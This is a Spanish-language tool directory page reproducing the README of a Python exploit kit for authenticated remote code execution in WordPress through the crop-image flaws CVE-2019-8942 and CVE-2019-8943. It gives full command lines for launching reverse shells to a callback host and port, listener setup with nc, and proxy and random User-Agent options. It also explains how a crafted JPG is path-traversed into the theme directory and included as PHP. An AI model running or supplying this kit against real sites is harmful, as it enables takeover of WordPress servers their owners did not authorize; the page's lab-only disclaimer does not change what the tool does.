Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WordPress-RCE-CVE-2019-8942 — Kit de explotación en Python para RCE de Crop Image en WordPress — CVE-2019-8942 y CVE-2019-8943 | Kitploit
Herramientas/GitHubGitHub/speatx/wordpress-rce-cve-2019-8942
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingDesarrollo de PayloadsLabs y Práctica
GitHubspeatx/wordpress-rce-cve-2019-8942

WordPress-RCE-CVE-2019-8942

Kit de explotación en Python para RCE de Crop Image en WordPress — CVE-2019-8942 y CVE-2019-8943

Ver Repositorio
17hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WordPress Recorte de Imagen RCE — CVE-2019-8942 / CVE-2019-8943

Implementación en Python3 de la cadena de explotación autenticada de recorte de imagen de WordPress. El repositorio está organizado alrededor de dos flujos de trabajo independientes: un script manual estilo OSCP y un script completamente automatizado con un manejador de reverse shell integrado.

Utilícelo solo en laboratorios autorizados, CTFs, plataformas de formación o sistemas donde tenga permiso explícito para realizar pruebas.


Versiones de WordPress afectadas

La cadena de explotación apunta a las vulnerabilidades registradas como:

  • CVE-2019-8942
  • CVE-2019-8943

El módulo público de Metasploit para esta vulnerabilidad describe las versiones afectadas como:

WordPress 5.0.0 and WordPress <= 4.9.8

Se requiere una cuenta válida de WordPress con permisos de subida/edición de medios. En muchos entornos de laboratorio, un usuario de nivel Autor es suficiente.


Estructura del repositorio

.
├── autoexploit.py
├── exploit_oscp.py
├── image.jpg
├── README.md
└── requirements.txt

image.jpg es el portador JPG predeterminado usado por el script estilo OSCP. Está incluido para que el flujo de trabajo manual funcione desde el primer momento sin tener que buscar una imagen aleatoria.

autoexploit.py es autónomo e incluye su propio portador JPG hexadecimal internamente, pero también puede aceptar un JPG personalizado con -i.


Instalación

python3 -m pip install -r requirements.txt

El único paquete de Python requerido es:

requests

Si desea soporte para proxy SOCKS, instale requests con las extensiones SOCKS en su entorno:

python3 -m pip install 'requests[socks]'

Selección de script

ScriptIdeal paraManejo de imagenManejo de shell
exploit_oscp.pyExplotación manual/estilo OSCPUsa image.jpg por defecto, o -i custom.jpgUsted inicia nc manualmente
autoexploit.pyUso rápido en laboratorios y pruebas repetitivasUsa un JPG hex incrustado por defecto, o -i custom.jpgInicia el listener, desencadena callbacks y abre una consola interactiva

Ambos scripts son independientes. Ninguno importa código del otro.


Flujo de trabajo estilo OSCP

exploit_oscp.py mantiene el flujo de trabajo explícito. Prepara el portador de imagen, realiza la cadena de explotación autenticada de WordPress, confirma la ejecución de comandos y desencadena una reverse shell hacia el listener que usted inició manualmente.

No inicia un manejador automáticamente y no utiliza Metasploit, Meterpreter ni msfvenom.

Uso básico de OSCP

Inicie primero su listener:

nc -lvnp 443

Ejecute el exploit usando la imagen image.jpg por defecto:

python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

Uso de OSCP con un JPG personalizado

nc -lvnp 443
python3 exploit_oscp.py -t http://target.local/ -u username -p password -i ./custom.jpg --lhost 10.10.14.8 --lport 443

Opciones de OSCP

OpciónRequeridoPor defectoSignificado
-t, --targetSíNingunoURL base de WordPress objetivo, por ejemplo http://target.local/
-u, --usernameSíNingunoNombre de usuario de WordPress
-p, --passwordSíNingunoContraseña de WordPress
-i, --imageNoimage.jpgPortador JPG a preparar y subir
--lhostSíNingunoSu IP de callback, normalmente su IP VPN/tun0
--lportSíNingunoPuerto donde su listener manual está esperando
--proxyNoNingunoURL del proxy, por ejemplo http://127.0.0.1:8080 o socks5://127.0.0.1:9050
--user-agentNoIncorporadoCabecera User-Agent personalizada
--random-user-agentNoDeshabilitadoUsar un User-Agent aleatorio similar al de un navegador
--timeoutNo20Timeout HTTP en segundos
--debugNoDeshabilitadoImprimir salida de depuración HTTP y guardar respuestas fallidas útiles

Ejemplo de OSCP con Burp

python3 exploit_oscp.py -t http://target.local/ -u username -p password -i ./image.jpg --lhost 10.10.14.8 --lport 443 --proxy http://127.0.0.1:8080

Flujo de trabajo completamente automatizado

autoexploit.py está diseñado para velocidad. Puede ejecutarse solo con las credenciales del objetivo e intentará seleccionar automáticamente la IP de callback y el puerto del listener.

Realiza el flujo completo de explotación, inicia un listener local, prueba múltiples estilos de payload de reverse shell y abre una consola interactiva más limpia con mensajes de estado local coloreados y manejo silencioso de actualización de TTY.

Uso automatizado básico

python3 autoexploit.py -t http://target.local/ -u username -p password

Uso automatizado con valores de callback explícitos

python3 autoexploit.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

Uso automatizado con imagen personalizada y proxy

python3 autoexploit.py -t http://target.local/ -u username -p password -i ./image.jpg --proxy http://127.0.0.1:8080

Opciones automatizadas

OpciónRequeridoPor defectoSignificado
-t, --targetSíNingunoURL base de WordPress objetivo
-u, --usernameSíNingunoNombre de usuario de WordPress
-p, --passwordSíNingunoContraseña de WordPress
-i, --imageNoJPG hex incrustadoPortador JPG personalizado opcional
--lhostNoAuto-detectadoIP de callback usada por la reverse shell
--lportNoPuerto local librePuerto del listener local
--listen-timeoutNo12Segundos a esperar por cada intento de reverse shell
--proxyNoNingunoURL del proxy, por ejemplo http://127.0.0.1:8080 o socks5://127.0.0.1:9050
--user-agentNoIncorporadoCabecera User-Agent personalizada
--random-user-agentNoDeshabilitadoUsar un User-Agent aleatorio similar al de un navegador
--timeoutNo20Timeout HTTP en segundos
--debugNoDeshabilitadoImprimir salida de depuración HTTP y guardar respuestas fallidas útiles

Ejemplos de proxy y User-Agent

Proxy HTTP a través de Burp:

python3 autoexploit.py -t http://target.local/ -u username -p password --proxy http://127.0.0.1:8080

Proxy SOCKS:

python3 autoexploit.py -t http://target.local/ -u username -p password --proxy socks5://127.0.0.1:9050

User-Agent personalizado:

python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443 --user-agent "Mozilla/5.0 Custom"

User-Agent aleatorio:

python3 autoexploit.py -t http://target.local/ -u username -p password --random-user-agent

Por qué es importante la imagen

Esto no es una subida PHP normal. WordPress espera contenido de imagen, procesa el archivo a través del editor de medios y crea una imagen recortada. La cadena de explotación luego abusa de los metadatos del adjunto y la travesía de rutas para colocar una imagen recortada dentro del directorio del tema activo. Finalmente, el archivo recortado se referencia como una plantilla de página para que WordPress lo incluya como PHP.

Un JPG aleatorio con PHP colocado en metadatos EXIF frágiles puede fallar porque GD puede eliminar o recodificar los metadatos durante el procesamiento del recorte. Este repositorio mantiene el flujo de trabajo claro:

  • exploit_oscp.py usa la imagen image.jpg incluida por defecto o una imagen personalizada pasada con -i.
  • autoexploit.py contiene un portador hexadecimal interno para mantenerse autónomo.
  • Ambos flujos preparan la subida de forma que se pretenda que sobreviva al paso de recorte de WordPress.

Flujo técnico

Descargar herramienta